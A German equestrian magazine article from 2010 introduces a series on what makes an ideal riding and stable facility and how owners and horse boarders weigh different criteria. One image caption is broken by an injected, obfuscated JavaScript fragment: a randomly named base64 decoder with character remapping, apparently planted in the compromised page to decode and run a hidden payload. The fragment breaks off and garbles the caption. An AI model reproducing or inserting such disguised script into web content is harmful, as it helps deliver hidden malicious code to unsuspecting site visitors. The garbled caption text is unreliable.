Zwischen Wunsch und Wirklichkeit: Die optimale Reitanlage

28. April 2010 | Von Redaktion | Kategorie: Featured, Stall- & Reitanlagen

Die Anforderungen an die moderne Reit- und Stallanlage sind in den letzten Jahren stetig gestiegen. Dies liegt nicht zuletzt daran, dass sich das Wissen um das Pferd ebenfalls permanent erweitert hat. Der einzelne Pferdebesitzer und Reiter, aber auch der Betreiber und Inhaber von Reitsportanlagen und Freizeitstallungen unterliegt diesem Wandel. In der Folge haben beide Parteien eine individuelle Vorstellung von der idealen Reitanlagen entwickelt.

Die Auswahl, aber auch die Gestaltung einer Anlage erfolgt nach individuellen Kriterien (Foto: Hanselmann).

Die Auswahl, aber auch die Gestaltung einer Anlage erfolgt nach individuellen Kriterien (Foto: Hanselmann).

Der Pferdebesitzer und potentielle Einsteller wird jede in Frage kommende Anlage anhand eines individuellen Kriterienkatalogs abgleichen. Aber auch der Reitanlagenbetreiber und Betriebsleiter kann durch die Gestaltung seiner Reitanlage und dedizierter Infrastrukturmassnahmen auf seinen Hof diejenige Klientel ansprechen, die er als seine Zielgruppe definiert hat

Eine gepflegte, parkähnliche Anlage kann ein Kriterium sein...

Eine gepflegte, parkähnliche Anlage kann ein Kriterium sein...

Hierfür ist es jedoch für beide Seiten erforderlich, das jeweilige Anforderungsprofil zu kennen und die daraus resultierenden Massnahmenbündel abzuleiten. Für den Reitanlagenbesitzer bedeutet dies, sich über die jeweils gewünschte Zielgruppe zu informieren und deren Bedürfnisse kennen zu lernen. Der Pferdebesitzer wird naturgemäss quasi „spiegelverkehrt“ vorgehen und seinen Bedarf vor allem mit den vorhandenen Infrastruktur- und Dienstleistungsangeboten einer Reitanlage vergleichen.

Denn eines kann mit Sicherheit gesagt werden: Die Ansprüche eines Sportpferdereiters sind mit grosser Wahrscheinlichkeit nicht deckungsgleich mit denen eines Breitensportlers oder sogenannten Freizeitreiters.

Welche Kriterien das sein können und welche Gewichtung diese bei der Ausformulierung der individuellen Ansprüche einnehmen können, sind Bestandteil der zukünftigen Beiträge zu dieser Thematik.

.. aber auch die Infrastruktureinrichtungen, wie bspw. Laufb<script type=function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand oder Führanlage, können massgeblich für eine Entscheidung sein (Fotos: Hanselmann)." width="200" height="300" />

Kleinere Ideen und grössere Innovationen werden vorgestellt, sei es in Form von Produktpräsentationen oder als Anwenderbericht. In einem engen Zusammenhang auf dem Weg zur optimalen Reitanlage steht die Überprüfung der Alltags- bzw. Praxistauglichkeit bestehender Einrichtungen oder Serviceangebote. Hieraus ergibt sich nicht selten ein Optimierungspotential, welches im Einzelfall durchaus zu alternativen Lösungen führen kann.

Dies und weiteres wird in den folgenden Wochen Thema dieses Serienspecials sein.

Tags:
Trackback URL: http://www.horse-today.de/wp-trackback.php?p=23960

Hier klicken, um einen Kommentar zu schreiben